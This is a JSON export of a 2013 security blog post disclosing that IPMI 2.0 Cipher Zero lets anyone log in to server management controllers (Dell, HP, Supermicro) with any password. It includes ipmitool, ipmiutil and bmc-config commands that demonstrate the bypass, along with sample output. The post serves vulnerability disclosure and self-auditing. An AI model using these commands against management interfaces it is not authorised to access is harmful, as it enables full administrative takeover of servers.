{"id":769,"date":"2013-02-22T15:53:30","date_gmt":"2013-02-22T15:53:30","guid":{"rendered":"https:\/\/trouble.org\/?p=769"},"modified":"2013-03-10T07:52:51","modified_gmt":"2013-03-10T07:52:51","slug":"the-infamous-daryl-er-cipher-zero","status":"publish","type":"post","link":"https:\/\/trouble.org\/?p=769","title":{"rendered":"The infamous Daryl, er, Cipher Zero"},"content":{"rendered":"<blockquote><p><a href=\"https:\/\/trouble.org\/wp-content\/uploads\/2013\/02\/zero-effect.jpg\"><br \/>\n<img loading=\"lazy\" decoding=\"async\" class=\"alignright\" title=\"zero-effect\" alt=\"\" src=\"https:\/\/trouble.org\/wp-content\/uploads\/2013\/02\/zero-effect.jpg\" width=\"132\" height=\"204\" \/><\/a>Now, a few words on looking for things. When you go looking for something specific, your chances of finding it are very bad. Because of all the things in the world, you&#8217;re only looking for one of them. When you go looking for anything at all, your chances of finding it are very good. Because of all the things in the world, you&#8217;re sure to find some of them.<\/p><\/blockquote>\n<p style=\"padding-left: 90px;\">&#8211; Daryl Zero, The Zero Effect<\/p>\n<p>The Zero Effect is a weird, quirky movie about a detective I can relate to, although I&#8217;m not as smart. How many times have I looked for that one thing, and then found something more important that had nothing to do with it? Sometimes you simply have to keep your eyes open.<\/p>\n<p>The short version &#8211; Cipher Zero is the first Cipher in the IPMI 2.0 spec. \u00a0It allows you to authenticate to\u00a0IPMI\u00a0without a password &#8211; in other words, it&#8217;s really no cipher at all, or the un-cipher. \u00a0It removes all security from\u00a0IPMI. \u00a0But who cares, really? 
\u00a0Surely vendors wouldn&#8217;t turn this on by default, would they? \u00a0Well\u2026 it&#8217;s enabled on my Dell (iDRAC 6), HP (iLO 3), and Supermicro. \u00a0That&#8217;s all the systems I have access to; presumably there\u00a0are more. (Important note &#8211; it does need a valid user and IPMI channel for it to work, so <strong>mostly<\/strong> it wouldn&#8217;t work until the box was provisioned or turned on with at least one user.)<\/p>\n<p>Longer version: let&#8217;s see, to belabor the obvious. To execute an IPMI command, you can use good ol&#8217; bmc-config with the proper authentication:<\/p>\n<p style=\"padding-left: 30px;\"><em>$ bmc-config -D LAN_2_0 -I 0 -v -u root -p calvin -h 10.0.0.1 --checkout|grep -i cipher_suite_id_0<\/em><br \/>\n<em> Maximum_Privilege_Cipher_Suite_Id_0 Administrator<\/em><\/p>\n<p>You know, that line of output is not good. How not good is &#8220;not good&#8221;? Well, let&#8217;s try it again&#8230; this time with &#8220;FluffyWabbit&#8221; as the password:<\/p>\n<p style=\"padding-left: 30px;\"><em>$ bmc-config -D LAN_2_0 -I 0 -v -u root -p FluffyWabbit -h 10.0.0.1 --checkout|grep -i cipher_suite_id_0<\/em><br \/>\n<em> Maximum_Privilege_Cipher_Suite_Id_0 Administrator<\/em><\/p>\n<p>I guess this is neat. Or sad. Or something. You can try other passwords to verify FluffyWabbit isn&#8217;t some vendor hardcoded backdoor ;)<\/p>\n<p>I believe that IBM, as of the M2\/Nehalem generation, has essentially abolished cipher zero through the efforts of Jarred B Johnson (kudos to both!). I&#8217;m not sure who else still has this going on\u2026 but you might check your own boxes. 
\u00a0It&#8217;d be interesting to hear about the vendors that do have this on or off by default.<\/p>\n<p>&nbsp;<\/p>\n<p><span style=\"color: #ff0000;\">DISCLAIMER<\/span> &#8211; various versions of the IPMI utilities &#8211; including bmc-config &#8211; <span style=\"color: #ff0000;\">WILL FAIL and give FALSE results<\/span>!\u00a0 They do not work correctly with cipher 0 and will fail; this misled me early on on my own boxes. The latest version of freeipmi seems to work on all the ones I&#8217;ve tested, at least; make sure you have downloaded the latest copy and try this to verify good ol&#8217; cipher 0 is still around.<\/p>\n<p>Most commands say they support it; ensure you have the latest version, bugs abound out there in the tools and\/or in the BMCs, but bmc-config seems pretty solid on this. Some other options for popular utilities:<\/p>\n<p style=\"padding-left: 30px;\"><em>$ ipmitool -I lanplus -C 0 -H 10.0.0.1 -U admin -P FluffyWabbit lan print<\/em><\/p>\n<p style=\"padding-left: 30px;\"><em>$ ipmiutil lan -J 0 -N 10.0.0.1 -U admin -P FluffyBunny<\/em><\/p>\n<p>Ipmiutil has a nice printing of the results &#8211; anything in the RMCP+ line that looks like a zero is bad :)<\/p>\n<p style=\"padding-left: 30px;\">$ ipmitool -I lanplus -C 0 -H 10.0.0.1 -U root -P calvin lan print<br \/>\nSet in Progress : Set Complete<br \/>\nAuth Type Support : NONE MD2 MD5 PASSWORD<br \/>\nAuth Type Enable : Callback : MD2 MD5<br \/>\n: User : MD2 MD5<br \/>\n: Operator : MD2 MD5<br \/>\n: Admin : MD2 MD5<br \/>\n: OEM :<br \/>\nIP Address Source : Static Address<br \/>\nIP Address : 192.168.0.23<br \/>\nSubnet Mask : 255.255.255.0<br \/>\nMAC Address : 14:fe:b5:c7:df:28<br \/>\nSNMP Community String : public<br \/>\nIP Header : TTL=0x40 Flags=0x40 Precedence=0x00 TOS=0x10<br \/>\nDefault Gateway IP : 192.168.0.1<br \/>\nDefault Gateway MAC : 00:00:00:00:00:00<br \/>\nBackup Gateway IP : 0.0.0.0<br \/>\nBackup Gateway MAC : 00:00:00:00:00:00<br \/>\n802.1q VLAN ID : 
Disabled<br \/>\n802.1q VLAN Priority : 0<br \/>\n<span style=\"color: #ff0000;\">RMCP+ Cipher Suites : 0,1,2,3,4,5,6,7,8,9,10,11,12,13,14<\/span><br \/>\nCipher Suite Priv Max : aaaaaaaaaaaaaaa<br \/>\n: X=Cipher Suite Unused<br \/>\n: c=CALLBACK<br \/>\n: u=USER<br \/>\n: o=OPERATOR<br \/>\n: a=ADMIN<br \/>\n: O=OEM<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Now, a few words on looking for things. When you go looking for something specific, your chances of finding it are very bad. Because of all the things in the world, you&#8217;re only looking for one of them. When you go looking for anything at all, your chances of finding it are very good. Because [&hellip;]<\/p>\n","protected":false},"author":44,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[176,154,4],"tags":[207,208,113,209,205,206,210],"class_list":["post-769","post","type-post","status-publish","format-standard","hentry","category-embedded","category-ipmi-2","category-security","tag-cipher-0","tag-daryl-zero","tag-ipmi","tag-movie","tag-oops","tag-they-did-it-again","tag-well-this-sucks"],"_links":{"self":[{"href":"https:\/\/trouble.org\/index.php?rest_route=\/wp\/v2\/posts\/769","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/trouble.org\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/trouble.org\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/trouble.org\/index.php?rest_route=\/wp\/v2\/users\/44"}],"replies":[{"embeddable":true,"href":"https:\/\/trouble.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=769"}],"version-history":[{"count":26,"href":"https:\/\/trouble.org\/index.php?rest_route=\/wp\/v2\/posts\/769\/revisions"}],"predecessor-version":[{"id":810,"href":"https:\/\/trouble.org\/index.php?rest_route=\/wp\/v2\/posts\/769\/revisions\/810"}],"wp:attachment":[{"href":"https:\/\/trouble.org\/index.ph
p?rest_route=%2Fwp%2Fv2%2Fmedia&parent=769"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/trouble.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=769"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/trouble.org\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=769"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}